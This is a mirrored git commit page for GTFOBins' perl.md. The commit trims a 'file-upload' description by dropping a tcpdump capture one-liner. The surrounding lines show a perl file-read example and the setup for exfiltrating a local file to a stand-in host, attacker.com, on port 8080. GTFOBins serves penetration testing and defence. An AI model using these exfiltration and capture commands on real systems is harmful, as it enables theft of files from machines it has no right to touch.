mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-24 04:22:52 +01:00
Update perl.md
This commit is contained in:
parent
c293a88177
commit
0038e022c0
@ -7,7 +7,7 @@ functions:
|
|||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
perl -ne print $LFILE
|
perl -ne print $LFILE
|
||||||
file-upload:
|
file-upload:
|
||||||
- description: Send local file via "d" parameter of a HTTP POST request. Capture content on attacker host, example: `LPORT=8080; tcpdump -i any -s 0 -l -A "tcp dst port $LPORT and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)" | awk 'BEGIN { show=0 } /Connection: close/ { show=1; next } show'`
|
- description: Send local file via "d" parameter of a HTTP POST request.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=8080
|
export RPORT=8080
|
||||||
|
Loading…
Reference in New Issue
Block a user